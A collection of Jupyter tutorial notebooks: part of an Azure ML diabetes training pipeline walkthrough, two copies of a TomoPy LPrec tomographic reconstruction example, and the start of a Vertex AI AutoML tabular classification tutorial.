diabetes_ds = ws.datasets.get("diabetes dataset")
# Create an OutputFileDatasetConfig (temporary Data Reference) for data passed from step 1 to step 2
prepped_data = OutputFileDatasetConfig("prepped_data")
# Step 1, Run the data prep script
prep_step = PythonScriptStep(name = "Prepare Data",
source_directory = experiment_folder,
script_name = "prep_diabetes.py",
arguments = ['--input-data', diabetes_ds.as_named_input('raw_data'),
'--prepped-data', prepped_data],
compute_target = pipeline_cluster,
runconfig = pipeline_run_config,
allow_reuse = True)
# Step 2, run the training script
train_step = PythonScriptStep(name = "Train and Register Model",
source_directory = experiment_folder,
script_name = "train_diabetes.py",
arguments = ['--training-data', prepped_data.as_input()],
compute_target = pipeline_cluster,
runconfig = pipeline_run_config,
allow_reuse = True)
print("Pipeline steps defined")
###Output
_____no_output_____
###Markdown
OK, you're ready to build the pipeline from the steps you've defined and run it as an experiment.
###Code
from azureml.core import Experiment
from azureml.pipeline.core import Pipeline
from azureml.widgets import RunDetails
# Construct the pipeline
pipeline_steps = [prep_step, train_step]
pipeline = Pipeline(workspace=ws, steps=pipeline_steps)
print("Pipeline is built.")
# Create an experiment and run the pipeline
experiment = Experiment(workspace=ws, name = 'mslearn-diabetes-pipeline')
pipeline_run = experiment.submit(pipeline, regenerate_outputs=True)
print("Pipeline submitted for execution.")
RunDetails(pipeline_run).show()
pipeline_run.wait_for_completion(show_output=True)
###Output
_____no_output_____
###Markdown
A graphical representation of the pipeline experiment will be displayed in the widget as it runs. Keep an eye on the kernel indicator at the top right of the page; when it turns from **&#9899;** to **&#9711;**, the code has finished running. You can also monitor pipeline runs in the **Experiments** page in [Azure Machine Learning studio](https://ml.azure.com).When the pipeline has finished, you can examine the metrics recorded by its child runs.
###Code
for run in pipeline_run.get_children():
print(run.name, ':')
metrics = run.get_metrics()
for metric_name in metrics:
print('\t',metric_name, ":", metrics[metric_name])
###Output
_____no_output_____
###Markdown
Assuming the pipeline was successful, a new model should be registered with a *Training context* tag indicating it was trained in a pipeline. Run the following code to verify this.
###Code
from azureml.core import Model
for model in Model.list(ws):
print(model.name, 'version:', model.version)
for tag_name in model.tags:
tag = model.tags[tag_name]
print ('\t',tag_name, ':', tag)
for prop_name in model.properties:
prop = model.properties[prop_name]
print ('\t',prop_name, ':', prop)
print('\n')
###Output
_____no_output_____
###Markdown
Publish the pipelineAfter you've created and tested a pipeline, you can publish it as a REST service.
###Code
# Publish the pipeline from the run
published_pipeline = pipeline_run.publish_pipeline(
name="diabetes-training-pipeline", description="Trains diabetes model", version="1.0")
published_pipeline
###Output
_____no_output_____
###Markdown
Note that the published pipeline has an endpoint, which you can see in the **Endpoints** page (on the **Pipeline Endpoints** tab) in [Azure Machine Learning studio](https://ml.azure.com). You can also find its URI as a property of the published pipeline object:
###Code
rest_endpoint = published_pipeline.endpoint
print(rest_endpoint)
###Output
_____no_output_____
###Markdown
Call the pipeline endpointTo use the endpoint, client applications need to make a REST call over HTTP. This request must be authenticated, so an authorization header is required. A real application would require a service principal with which to be authenticated, but to test this out, we'll use the authorization header from your current connection to your Azure workspace, which you can get using the following code:
###Code
from azureml.core.authentication import InteractiveLoginAuthentication
interactive_auth = InteractiveLoginAuthentication()
auth_header = interactive_auth.get_authentication_header()
print("Authentication header ready.")
###Output
_____no_output_____
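###Markdown
For reference, in a real application you would authenticate with a service principal instead of the interactive login. The sketch below is illustrative only; the tenant ID, application (client) ID, and secret shown are hypothetical placeholders that you would replace with your own values (ideally loaded from a secure store rather than hard-coded).
###Code
# Illustrative sketch only - not required for this lab
from azureml.core.authentication import ServicePrincipalAuthentication
# Placeholder values - replace with your own service principal details
sp_auth = ServicePrincipalAuthentication(tenant_id="<your-tenant-id>",
                                         service_principal_id="<your-app-id>",
                                         service_principal_password="<your-app-secret>")
# The resulting header could be used in place of the interactive one
# auth_header = sp_auth.get_authentication_header()
###Output
_____no_output_____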
###Markdown
Now we're ready to call the REST interface. The pipeline runs asynchronously, so we'll get an identifier back, which we can use to track the pipeline experiment as it runs:
###Code
import requests
experiment_name = 'mslearn-diabetes-pipeline'
rest_endpoint = published_pipeline.endpoint
response = requests.post(rest_endpoint,
headers=auth_header,
json={"ExperimentName": experiment_name})
run_id = response.json()["Id"]
run_id
###Output
_____no_output_____
###Markdown
Since you have the run ID, you can use it to wait for the run to complete.> **Note**: The pipeline should complete quickly, because each step was configured to allow output reuse. This was done primarily for convenience and to save time in this course. In reality, you'd likely want the first step to run every time in case the data has changed, and trigger the subsequent steps only if the output from step one changes.
###Code
from azureml.pipeline.core.run import PipelineRun
published_pipeline_run = PipelineRun(ws.experiments[experiment_name], run_id)
published_pipeline_run.wait_for_completion(show_output=True)
###Output
_____no_output_____
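###Markdown
As a sketch of the variation described in the note above, you could force the data preparation step to run every time by setting `allow_reuse=False` when you define it, while the training step keeps `allow_reuse=True` so it is only re-run when its inputs change. This mirrors the earlier step definition and is illustrative only; it is not required for this lab.
###Code
# Illustrative variation of the earlier step definition: always re-run data prep
prep_step = PythonScriptStep(name = "Prepare Data",
                             source_directory = experiment_folder,
                             script_name = "prep_diabetes.py",
                             arguments = ['--input-data', diabetes_ds.as_named_input('raw_data'),
                                          '--prepped-data', prepped_data],
                             compute_target = pipeline_cluster,
                             runconfig = pipeline_run_config,
                             allow_reuse = False) # re-run this step on every pipeline submission
###Output
_____no_output_____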
###Markdown
Schedule the PipelineSuppose the clinic for the diabetes patients collects new data each week, and adds it to the dataset. You could run the pipeline every week to retrain the model with the new data.
###Code
from azureml.pipeline.core import ScheduleRecurrence, Schedule
# Submit the Pipeline every Monday at 00:00 UTC
recurrence = ScheduleRecurrence(frequency="Week", interval=1, week_days=["Monday"], time_of_day="00:00")
weekly_schedule = Schedule.create(ws, name="weekly-diabetes-training",
description="Based on time",
pipeline_id=published_pipeline.id,
experiment_name='mslearn-diabetes-pipeline',
recurrence=recurrence)
print('Pipeline scheduled.')
###Output
_____no_output_____
###Markdown
You can retrieve the schedules that are defined in the workspace like this:
###Code
schedules = Schedule.list(ws)
schedules
###Output
_____no_output_____
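###Markdown
If you later want to stop the recurring runs (for example, when cleaning up after this lab), each schedule can be disabled. This is a sketch based on the `Schedule.disable` method and assumes the `schedules` list retrieved above.
###Code
# Sketch: disable every schedule in the workspace so no further runs are triggered
for schedule in schedules:
    print('Disabling schedule:', schedule.id)
    schedule.disable(wait_for_provisioning=True)
###Output
_____no_output_____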
###Markdown
You can check the latest run like this:
###Code
pipeline_experiment = ws.experiments.get('mslearn-diabetes-pipeline')
latest_run = list(pipeline_experiment.get_runs())[0]
latest_run.get_details()
###Output
_____no_output_____ |
doc/source/ipynb/lprec.ipynb | ###Markdown
TomoPy with LPrecHere is an example of how to use the [log-polar based method](https://github.com/math-vrn/lprec) for reconstruction with TomoPy.To reconstruct the image with LPrec instead of TomoPy, change the ``algorithm`` keyword to ``tomopy.lprec``. Specify which LPrec algorithm to reconstruct with the ``lpmethod`` keyword. These two cells are an abbreviated setup for [Reconstruction with TomoPy](tomopy.rst).
###Code
import dxchange
import matplotlib.pyplot as plt
import tomopy
proj, flat, dark, theta = dxchange.read_aps_32id(
fname='../../../source/tomopy/data/tooth.h5',
sino=(0, 2),
)
proj = tomopy.normalize(proj, flat, dark)
rot_center = 296
###Output
_____no_output_____
###Markdown
Note that with LPrec, there can be no negative values after the transmission tomography linearization:
###Code
proj = tomopy.minus_log(proj)
proj[proj < 0] = 0 # no values less than zero with lprec
###Output
_____no_output_____
###Markdown
Reconstruction using FBP method with the log-polar coordinates.$$ \hat{f}=\mathcal{W}\mathcal{R}^* g $$
###Code
recon = tomopy.recon(proj,
theta,
center=rot_center,
algorithm=tomopy.lprec,
lpmethod='fbp',
filter_name='parzen')
recon = tomopy.circ_mask(recon, axis=0, ratio=0.95)
plt.imshow(recon[0, :, :])
plt.show()
###Output
Reconstructing 48 slice groups with 2 master threads...
###Markdown
Reconstruction using the gradient descent method with the log-polar coordinates.$$ \hat{f} = \text{argmin}_f\lVert\mathcal{R}f-g \rVert_2^2 $$
###Code
recon = tomopy.recon(proj,
theta,
center=rot_center,
algorithm=tomopy.lprec,
lpmethod='grad',
ncore=1,
num_iter=64,
reg_par=-1)
recon = tomopy.circ_mask(recon, axis=0, ratio=0.95)
plt.imshow(recon[0, :, :])
plt.show()
###Output
Reconstructing 1 slice groups with 1 master threads...
###Markdown
Reconstruction using the conjugate gradient method with the log-polar coordinates.$$ \hat{f} = \text{argmin}_f\lVert\mathcal{R}f-g \rVert_2^2 $$
###Code
recon = tomopy.recon(proj,
theta,
center=rot_center,
algorithm=tomopy.lprec,
lpmethod='cg',
ncore=1,
num_iter=16,
reg_par=-1)
recon = tomopy.circ_mask(recon, axis=0, ratio=0.95)
plt.imshow(recon[0, :, :])
plt.show()
###Output
Reconstructing 1 slice groups with 1 master threads...
###Markdown
Reconstruction using the TV method with the log-polar coordinates. It gives piecewise constant reconstructions and can be used for denoising.$$ \hat{f} = \text{argmin}_f\lVert\mathcal{R}f-g \rVert_2^2 + \lambda \lVert\nabla f\rVert_1 $$
###Code
recon = tomopy.recon(proj,
theta,
center=rot_center,
algorithm=tomopy.lprec,
lpmethod='tv',
ncore=1,
num_iter=512,
reg_par=5e-4)
recon = tomopy.circ_mask(recon, axis=0, ratio=0.95)
plt.imshow(recon[0, :, :])
plt.show()
###Output
Reconstructing 1 slice groups with 1 master threads...
###Markdown
Reconstruction using the TV-entropy method with the log-polar coordinates. It can be used for suppressing Poisson noise.$$ \hat{f} = \text{argmin}_f \lambda \lVert\nabla f\rVert_1+\int_\Omega\mathcal{R}f-g\log(\mathcal{R}f)df $$
###Code
recon = tomopy.recon(proj,
theta,
center=rot_center,
algorithm=tomopy.lprec,
lpmethod='tve',
ncore=1,
num_iter=512,
reg_par=2e-4)
recon = tomopy.circ_mask(recon, axis=0, ratio=0.95)
plt.imshow(recon[0, :, :])
plt.show()
###Output
Reconstructing 1 slice groups with 1 master threads...
###Markdown
Reconstruction using the TV-l1 method with the log-polar coordinates. It can be used to remove structures of a certain scale from an image, and the regularization parameter $\lambda$ can be used for scale selection. $$ \hat{f} = \text{argmin}_f\lVert\mathcal{R}f-g \rVert_1 + \lambda \lVert\nabla f\rVert_1 $$
###Code
recon = tomopy.recon(proj,
theta,
center=rot_center,
algorithm=tomopy.lprec,
lpmethod='tvl1',
ncore=1,
num_iter=512,
reg_par=3e-2)
recon = tomopy.circ_mask(recon, axis=0, ratio=0.95)
plt.imshow(recon[0, :, :])
plt.show()
###Output
Reconstructing 1 slice groups with 1 master threads...
###Markdown
Reconstruction using the MLEM method with the log-polar coordinates.
###Code
recon = tomopy.recon(proj,
theta,
center=rot_center,
algorithm=tomopy.lprec,
lpmethod='em',
ncore=1,
num_iter=64,
reg_par=0.05)
recon = tomopy.circ_mask(recon, axis=0, ratio=0.95)
plt.imshow(recon[0, :, :])
plt.show()
###Output
Reconstructing 1 slice groups with 1 master threads...
###Markdown
TomoPy with LPrecHere is an example of how to use the [log-polar based method](https://github.com/math-vrn/lprec) for reconstruction with TomoPy.To reconstruct the image with LPrec instead of TomoPy, change the ``algorithm`` keyword to ``tomopy.lprec``. Specify which LPrec algorithm to reconstruct with the ``lpmethod`` keyword. These two cells are an abbreviated setup for [Reconstruction with TomoPy](tomopy.rst).
###Code
import dxchange
import matplotlib.pyplot as plt
import tomopy
proj, flat, dark, theta = dxchange.read_aps_32id(
fname='../../source/tomopy/data/tooth.h5',
sino=(0, 2),
)
proj = tomopy.normalize(proj, flat, dark)
rot_center = 296
###Output
_____no_output_____
###Markdown
Note that with LPrec, there can be no negative values after the transmission tomography linearization:
###Code
proj = tomopy.minus_log(proj)
proj[proj < 0] = 0 # no values less than zero with lprec
###Output
_____no_output_____
###Markdown
Reconstruction using FBP method with the log-polar coordinates.$$ \hat{f}=\mathcal{W}\mathcal{R}^* g $$
###Code
recon = tomopy.recon(proj,
theta,
center=rot_center,
algorithm=tomopy.lprec,
lpmethod='fbp',
filter_name='parzen')
recon = tomopy.circ_mask(recon, axis=0, ratio=0.95)
plt.imshow(recon[0, :, :])
plt.show()
###Output
Reconstructing 48 slice groups with 2 master threads...
###Markdown
Reconstruction using the gradient descent method with the log-polar coordinates.$$ \hat{f} = \text{argmin}_f\lVert\mathcal{R}f-g \rVert_2^2 $$
###Code
recon = tomopy.recon(proj,
theta,
center=rot_center,
algorithm=tomopy.lprec,
lpmethod='grad',
ncore=1,
num_iter=64,
reg_par=-1)
recon = tomopy.circ_mask(recon, axis=0, ratio=0.95)
plt.imshow(recon[0, :, :])
plt.show()
###Output
Reconstructing 1 slice groups with 1 master threads...
###Markdown
Reconstruction using the conjugate gradient method with the log-polar coordinates.$$ \hat{f} = \text{argmin}_f\lVert\mathcal{R}f-g \rVert_2^2 $$
###Code
recon = tomopy.recon(proj,
theta,
center=rot_center,
algorithm=tomopy.lprec,
lpmethod='cg',
ncore=1,
num_iter=16,
reg_par=-1)
recon = tomopy.circ_mask(recon, axis=0, ratio=0.95)
plt.imshow(recon[0, :, :])
plt.show()
###Output
Reconstructing 1 slice groups with 1 master threads...
###Markdown
Reconstruction using the TV method with the log-polar coordinates. It gives piecewise constant reconstructions and can be used for denoising.$$ \hat{f} = \text{argmin}_f\lVert\mathcal{R}f-g \rVert_2^2 + \lambda \lVert\nabla f\rVert_1 $$
###Code
recon = tomopy.recon(proj,
theta,
center=rot_center,
algorithm=tomopy.lprec,
lpmethod='tv',
ncore=1,
num_iter=512,
reg_par=5e-4)
recon = tomopy.circ_mask(recon, axis=0, ratio=0.95)
plt.imshow(recon[0, :, :])
plt.show()
###Output
Reconstructing 1 slice groups with 1 master threads...
###Markdown
Reconstruction using the TV-entropy method with the log-polar coordinates. It can be used for suppressing Poisson noise.$$ \hat{f} = \text{argmin}_f \lambda \lVert\nabla f\rVert_1+\int_\Omega\mathcal{R}f-g\log(\mathcal{R}f)df $$
###Code
recon = tomopy.recon(proj,
theta,
center=rot_center,
algorithm=tomopy.lprec,
lpmethod='tve',
ncore=1,
num_iter=512,
reg_par=2e-4)
recon = tomopy.circ_mask(recon, axis=0, ratio=0.95)
plt.imshow(recon[0, :, :])
plt.show()
###Output
Reconstructing 1 slice groups with 1 master threads...
###Markdown
Reconstruction using the TV-l1 method with the log-polar coordinates. It can be used to remove structures of a certain scale from an image, and the regularization parameter $\lambda$ can be used for scale selection. $$ \hat{f} = \text{argmin}_f\lVert\mathcal{R}f-g \rVert_1 + \lambda \lVert\nabla f\rVert_1 $$
###Code
recon = tomopy.recon(proj,
theta,
center=rot_center,
algorithm=tomopy.lprec,
lpmethod='tvl1',
ncore=1,
num_iter=512,
reg_par=3e-2)
recon = tomopy.circ_mask(recon, axis=0, ratio=0.95)
plt.imshow(recon[0, :, :])
plt.show()
###Output
Reconstructing 1 slice groups with 1 master threads...
|
courses/machine_learning/deepdive2/launching_into_ml/solutions/automl-tabular-classification.ipynb | ###Markdown
Vertex AI Model Builder SDK: AutoML Tabular Training and Prediction OverviewThis tutorial demonstrates how to use the Vertex AI Python client library to train and deploy a tabular classification model for online prediction. Learning ObjectiveIn this notebook, you learn how to:* Create a Vertex AI model training job.* Train an AutoML Tabular model.* Deploy the `Model` resource to a serving `Endpoint` resource.* Make a prediction by sending data.* Undeploy the `Model` resource. IntroductionThis notebook demonstrates, using the Vertex AI Python client library, how to train and make predictions on an AutoML model based on a tabular dataset. Alternatively, you can train and make predictions on models by using the gcloud command-line tool or by using the online Cloud Console.Each learning objective will correspond to a __TODO__ in this student lab notebook -- try to complete this notebook first and then review the [solution notebook](../solutions/automl-tabular-classification.ipynb). **Make sure to enable the Vertex AI API and Compute Engine API.** Installation
###Code
import os
# The Google Cloud Notebook product has specific requirements
IS_GOOGLE_CLOUD_NOTEBOOK = os.path.exists("/opt/deeplearning/metadata/env_version")
USER_FLAG = ""
# Google Cloud Notebook requires dependencies to be installed with '--user'
if IS_GOOGLE_CLOUD_NOTEBOOK:
USER_FLAG = "--user"
###Output
_____no_output_____
###Markdown
Install the latest version of the Vertex AI client library.Run the following command in your virtual environment to install the Vertex SDK for Python:
###Code
! pip install {USER_FLAG} --upgrade google-cloud-aiplatform
###Output
Requirement already satisfied: google-cloud-aiplatform in /opt/conda/lib/python3.7/site-packages (1.1.1)
Collecting google-cloud-aiplatform
Downloading google_cloud_aiplatform-1.3.0-py2.py3-none-any.whl (1.3 MB)
[K |████████████████████████████████| 1.3 MB 7.6 MB/s eta 0:00:01
[?25hRequirement already satisfied: proto-plus>=1.10.1 in /opt/conda/lib/python3.7/site-packages (from google-cloud-aiplatform) (1.19.0)
Requirement already satisfied: google-cloud-bigquery<3.0.0dev,>=1.15.0 in /opt/conda/lib/python3.7/site-packages (from google-cloud-aiplatform) (2.23.2)
Requirement already satisfied: google-api-core[grpc]<3.0.0dev,>=1.26.0 in /opt/conda/lib/python3.7/site-packages (from google-cloud-aiplatform) (1.31.1)
Requirement already satisfied: google-cloud-storage<2.0.0dev,>=1.32.0 in /opt/conda/lib/python3.7/site-packages (from google-cloud-aiplatform) (1.41.1)
Requirement already satisfied: packaging>=14.3 in /opt/conda/lib/python3.7/site-packages (from google-cloud-aiplatform) (21.0)
Requirement already satisfied: googleapis-common-protos<2.0dev,>=1.6.0 in /opt/conda/lib/python3.7/site-packages (from google-api-core[grpc]<3.0.0dev,>=1.26.0->google-cloud-aiplatform) (1.53.0)
Requirement already satisfied: protobuf>=3.12.0 in /opt/conda/lib/python3.7/site-packages (from google-api-core[grpc]<3.0.0dev,>=1.26.0->google-cloud-aiplatform) (3.16.0)
Requirement already satisfied: six>=1.13.0 in /opt/conda/lib/python3.7/site-packages (from google-api-core[grpc]<3.0.0dev,>=1.26.0->google-cloud-aiplatform) (1.16.0)
Requirement already satisfied: pytz in /opt/conda/lib/python3.7/site-packages (from google-api-core[grpc]<3.0.0dev,>=1.26.0->google-cloud-aiplatform) (2021.1)
Requirement already satisfied: google-auth<2.0dev,>=1.25.0 in /opt/conda/lib/python3.7/site-packages (from google-api-core[grpc]<3.0.0dev,>=1.26.0->google-cloud-aiplatform) (1.34.0)
Requirement already satisfied: requests<3.0.0dev,>=2.18.0 in /opt/conda/lib/python3.7/site-packages (from google-api-core[grpc]<3.0.0dev,>=1.26.0->google-cloud-aiplatform) (2.25.1)
Requirement already satisfied: setuptools>=40.3.0 in /opt/conda/lib/python3.7/site-packages (from google-api-core[grpc]<3.0.0dev,>=1.26.0->google-cloud-aiplatform) (49.6.0.post20210108)
Requirement already satisfied: grpcio<2.0dev,>=1.29.0 in /opt/conda/lib/python3.7/site-packages (from google-api-core[grpc]<3.0.0dev,>=1.26.0->google-cloud-aiplatform) (1.38.1)
Requirement already satisfied: rsa<5,>=3.1.4 in /opt/conda/lib/python3.7/site-packages (from google-auth<2.0dev,>=1.25.0->google-api-core[grpc]<3.0.0dev,>=1.26.0->google-cloud-aiplatform) (4.7.2)
Requirement already satisfied: cachetools<5.0,>=2.0.0 in /opt/conda/lib/python3.7/site-packages (from google-auth<2.0dev,>=1.25.0->google-api-core[grpc]<3.0.0dev,>=1.26.0->google-cloud-aiplatform) (4.2.2)
Requirement already satisfied: pyasn1-modules>=0.2.1 in /opt/conda/lib/python3.7/site-packages (from google-auth<2.0dev,>=1.25.0->google-api-core[grpc]<3.0.0dev,>=1.26.0->google-cloud-aiplatform) (0.2.7)
Requirement already satisfied: google-resumable-media<3.0dev,>=0.6.0 in /opt/conda/lib/python3.7/site-packages (from google-cloud-bigquery<3.0.0dev,>=1.15.0->google-cloud-aiplatform) (1.3.2)
Requirement already satisfied: google-cloud-core<3.0.0dev,>=1.4.1 in /opt/conda/lib/python3.7/site-packages (from google-cloud-bigquery<3.0.0dev,>=1.15.0->google-cloud-aiplatform) (1.7.2)
Requirement already satisfied: google-crc32c<2.0dev,>=1.0 in /opt/conda/lib/python3.7/site-packages (from google-resumable-media<3.0dev,>=0.6.0->google-cloud-bigquery<3.0.0dev,>=1.15.0->google-cloud-aiplatform) (1.1.2)
Requirement already satisfied: cffi>=1.0.0 in /opt/conda/lib/python3.7/site-packages (from google-crc32c<2.0dev,>=1.0->google-resumable-media<3.0dev,>=0.6.0->google-cloud-bigquery<3.0.0dev,>=1.15.0->google-cloud-aiplatform) (1.14.6)
Requirement already satisfied: pycparser in /opt/conda/lib/python3.7/site-packages (from cffi>=1.0.0->google-crc32c<2.0dev,>=1.0->google-resumable-media<3.0dev,>=0.6.0->google-cloud-bigquery<3.0.0dev,>=1.15.0->google-cloud-aiplatform) (2.20)
Requirement already satisfied: pyparsing>=2.0.2 in /opt/conda/lib/python3.7/site-packages (from packaging>=14.3->google-cloud-aiplatform) (2.4.7)
Requirement already satisfied: pyasn1<0.5.0,>=0.4.6 in /opt/conda/lib/python3.7/site-packages (from pyasn1-modules>=0.2.1->google-auth<2.0dev,>=1.25.0->google-api-core[grpc]<3.0.0dev,>=1.26.0->google-cloud-aiplatform) (0.4.8)
Requirement already satisfied: certifi>=2017.4.17 in /opt/conda/lib/python3.7/site-packages (from requests<3.0.0dev,>=2.18.0->google-api-core[grpc]<3.0.0dev,>=1.26.0->google-cloud-aiplatform) (2021.5.30)
Requirement already satisfied: urllib3<1.27,>=1.21.1 in /opt/conda/lib/python3.7/site-packages (from requests<3.0.0dev,>=2.18.0->google-api-core[grpc]<3.0.0dev,>=1.26.0->google-cloud-aiplatform) (1.26.6)
Requirement already satisfied: chardet<5,>=3.0.2 in /opt/conda/lib/python3.7/site-packages (from requests<3.0.0dev,>=2.18.0->google-api-core[grpc]<3.0.0dev,>=1.26.0->google-cloud-aiplatform) (4.0.0)
Requirement already satisfied: idna<3,>=2.5 in /opt/conda/lib/python3.7/site-packages (from requests<3.0.0dev,>=2.18.0->google-api-core[grpc]<3.0.0dev,>=1.26.0->google-cloud-aiplatform) (2.10)
Installing collected packages: google-cloud-aiplatform
[33m WARNING: The script tb-gcp-uploader is installed in '/home/jupyter/.local/bin' which is not on PATH.
Consider adding this directory to PATH or, if you prefer to suppress this warning, use --no-warn-script-location.[0m
Successfully installed google-cloud-aiplatform-1.3.0
###Markdown
Install the Cloud Storage library:
###Code
! pip install {USER_FLAG} --upgrade google-cloud-storage
###Output
Requirement already satisfied: google-cloud-storage in /opt/conda/lib/python3.7/site-packages (1.41.1)
Collecting google-cloud-storage
Downloading google_cloud_storage-1.42.0-py2.py3-none-any.whl (105 kB)
[K |████████████████████████████████| 105 kB 8.1 MB/s eta 0:00:01
[?25hRequirement already satisfied: google-resumable-media<3.0dev,>=1.3.0 in /opt/conda/lib/python3.7/site-packages (from google-cloud-storage) (1.3.2)
Requirement already satisfied: google-auth<3.0dev,>=1.25.0 in /opt/conda/lib/python3.7/site-packages (from google-cloud-storage) (1.34.0)
Requirement already satisfied: google-cloud-core<3.0dev,>=1.6.0 in /opt/conda/lib/python3.7/site-packages (from google-cloud-storage) (1.7.2)
Requirement already satisfied: google-api-core<3.0dev,>=1.29.0 in /opt/conda/lib/python3.7/site-packages (from google-cloud-storage) (1.31.1)
Requirement already satisfied: requests<3.0.0dev,>=2.18.0 in /opt/conda/lib/python3.7/site-packages (from google-cloud-storage) (2.25.1)
Requirement already satisfied: packaging>=14.3 in /opt/conda/lib/python3.7/site-packages (from google-api-core<3.0dev,>=1.29.0->google-cloud-storage) (21.0)
Requirement already satisfied: protobuf>=3.12.0 in /opt/conda/lib/python3.7/site-packages (from google-api-core<3.0dev,>=1.29.0->google-cloud-storage) (3.16.0)
Requirement already satisfied: six>=1.13.0 in /opt/conda/lib/python3.7/site-packages (from google-api-core<3.0dev,>=1.29.0->google-cloud-storage) (1.16.0)
Requirement already satisfied: pytz in /opt/conda/lib/python3.7/site-packages (from google-api-core<3.0dev,>=1.29.0->google-cloud-storage) (2021.1)
Requirement already satisfied: googleapis-common-protos<2.0dev,>=1.6.0 in /opt/conda/lib/python3.7/site-packages (from google-api-core<3.0dev,>=1.29.0->google-cloud-storage) (1.53.0)
Requirement already satisfied: setuptools>=40.3.0 in /opt/conda/lib/python3.7/site-packages (from google-api-core<3.0dev,>=1.29.0->google-cloud-storage) (49.6.0.post20210108)
Requirement already satisfied: cachetools<5.0,>=2.0.0 in /opt/conda/lib/python3.7/site-packages (from google-auth<3.0dev,>=1.25.0->google-cloud-storage) (4.2.2)
Requirement already satisfied: pyasn1-modules>=0.2.1 in /opt/conda/lib/python3.7/site-packages (from google-auth<3.0dev,>=1.25.0->google-cloud-storage) (0.2.7)
Requirement already satisfied: rsa<5,>=3.1.4 in /opt/conda/lib/python3.7/site-packages (from google-auth<3.0dev,>=1.25.0->google-cloud-storage) (4.7.2)
Requirement already satisfied: google-crc32c<2.0dev,>=1.0 in /opt/conda/lib/python3.7/site-packages (from google-resumable-media<3.0dev,>=1.3.0->google-cloud-storage) (1.1.2)
Requirement already satisfied: cffi>=1.0.0 in /opt/conda/lib/python3.7/site-packages (from google-crc32c<2.0dev,>=1.0->google-resumable-media<3.0dev,>=1.3.0->google-cloud-storage) (1.14.6)
Requirement already satisfied: pycparser in /opt/conda/lib/python3.7/site-packages (from cffi>=1.0.0->google-crc32c<2.0dev,>=1.0->google-resumable-media<3.0dev,>=1.3.0->google-cloud-storage) (2.20)
Requirement already satisfied: pyparsing>=2.0.2 in /opt/conda/lib/python3.7/site-packages (from packaging>=14.3->google-api-core<3.0dev,>=1.29.0->google-cloud-storage) (2.4.7)
Requirement already satisfied: pyasn1<0.5.0,>=0.4.6 in /opt/conda/lib/python3.7/site-packages (from pyasn1-modules>=0.2.1->google-auth<3.0dev,>=1.25.0->google-cloud-storage) (0.4.8)
Requirement already satisfied: urllib3<1.27,>=1.21.1 in /opt/conda/lib/python3.7/site-packages (from requests<3.0.0dev,>=2.18.0->google-cloud-storage) (1.26.6)
Requirement already satisfied: idna<3,>=2.5 in /opt/conda/lib/python3.7/site-packages (from requests<3.0.0dev,>=2.18.0->google-cloud-storage) (2.10)
Requirement already satisfied: certifi>=2017.4.17 in /opt/conda/lib/python3.7/site-packages (from requests<3.0.0dev,>=2.18.0->google-cloud-storage) (2021.5.30)
Requirement already satisfied: chardet<5,>=3.0.2 in /opt/conda/lib/python3.7/site-packages (from requests<3.0.0dev,>=2.18.0->google-cloud-storage) (4.0.0)
Installing collected packages: google-cloud-storage
Successfully installed google-cloud-storage-1.42.0
###Markdown
Restart the kernelAfter you install the additional packages, you need to restart the notebook kernel so it can find the packages.
###Code
# Automatically restart kernel after installs
import os
if not os.getenv("IS_TESTING"):
# Automatically restart kernel after installs
import IPython
app = IPython.Application.instance()
app.kernel.do_shutdown(True)
###Output
_____no_output_____
###Markdown
Set your project ID**If you don't know your project ID**, you may be able to get your project ID using `gcloud`.
###Code
import os
PROJECT_ID = ""
# Get your Google Cloud project ID from gcloud
if not os.getenv("IS_TESTING"):
shell_output=!gcloud config list --format 'value(core.project)' 2>/dev/null
PROJECT_ID = shell_output[0]
print("Project ID: ", PROJECT_ID)
###Output
Project ID: qwiklabs-gcp-04-c846b6079446
###Markdown
Otherwise, set your project ID here.
###Code
if PROJECT_ID == "" or PROJECT_ID is None:
PROJECT_ID = "qwiklabs-gcp-04-c846b6079446" # @param {type:"string"}
###Output
_____no_output_____
###Markdown
TimestampIf you are in a live tutorial session, you might be using a shared test account or project. To avoid name collisions between users on resources created, you create a timestamp for each instance session, and append it onto the name of resources you create in this tutorial.
###Code
from datetime import datetime
TIMESTAMP = datetime.now().strftime("%Y%m%d%H%M%S")
###Output
_____no_output_____
###Markdown
Create a Cloud Storage bucket**The following steps are required, regardless of your notebook environment.**This notebook demonstrates how to use Model Builder SDK to create an AutoML model based on a tabular dataset. You will need to provide a Cloud Storage bucket where the dataset will be stored.Set the name of your Cloud Storage bucket below. It must be unique across all Cloud Storage buckets.You may also change the `REGION` variable, which is used for operations throughout the rest of this notebook. Make sure to [choose a region where Vertex AI services are available](https://cloud.google.com/vertex-ai/docs/general/locations). You may not use a Multi-Regional Storage bucket for training with Vertex AI.
###Code
BUCKET_NAME = "gs://qwiklabs-gcp-04-c846b6079446" # @param {type:"string"}
REGION = "us-central1" # @param {type:"string"}
if BUCKET_NAME == "" or BUCKET_NAME is None or BUCKET_NAME == "gs://qwiklabs-gcp-04-c846b6079446":
BUCKET_NAME = "gs://" + PROJECT_ID + "aip-" + TIMESTAMP
###Output
_____no_output_____
###Markdown
**Only if your bucket doesn't already exist**: Run the following cell to create your Cloud Storage bucket.
###Code
! gsutil mb -l $REGION $BUCKET_NAME
###Output
Creating gs://qwiklabs-gcp-04-c846b6079446aip-20210826051658/...
###Markdown
Finally, validate access to your Cloud Storage bucket by examining its contents:
###Code
! gsutil ls -al $BUCKET_NAME
###Output
_____no_output_____
###Markdown
Copy dataset into your Cloud Storage bucket
###Code
IMPORT_FILE = "petfinder-tabular-classification.csv"
! gsutil cp gs://cloud-samples-data/ai-platform-unified/datasets/tabular/{IMPORT_FILE} {BUCKET_NAME}/data/
gcs_source = f"{BUCKET_NAME}/data/{IMPORT_FILE}"
###Output
Copying gs://cloud-samples-data/ai-platform-unified/datasets/tabular/petfinder-tabular-classification.csv [Content-Type=text/csv]...
/ [1 files][872.8 KiB/872.8 KiB]
Operation completed over 1 objects/872.8 KiB.
###Markdown
Import Vertex SDK for PythonImport the Vertex SDK into your Python environment and initialize it.
###Code
import os
from google.cloud import aiplatform
aiplatform.init(project=PROJECT_ID, location=REGION)
###Output
_____no_output_____
###Markdown
TutorialNow you are ready to create your AutoML Tabular model. Create a Managed Tabular Dataset from a CSVThis section will create a dataset from a CSV file stored on your GCS bucket.
###Code
ds = dataset = aiplatform.TabularDataset.create(
display_name="petfinder-tabular-dataset",
gcs_source=gcs_source,
)
ds.resource_name
###Output
INFO:google.cloud.aiplatform.datasets.dataset:Creating TabularDataset
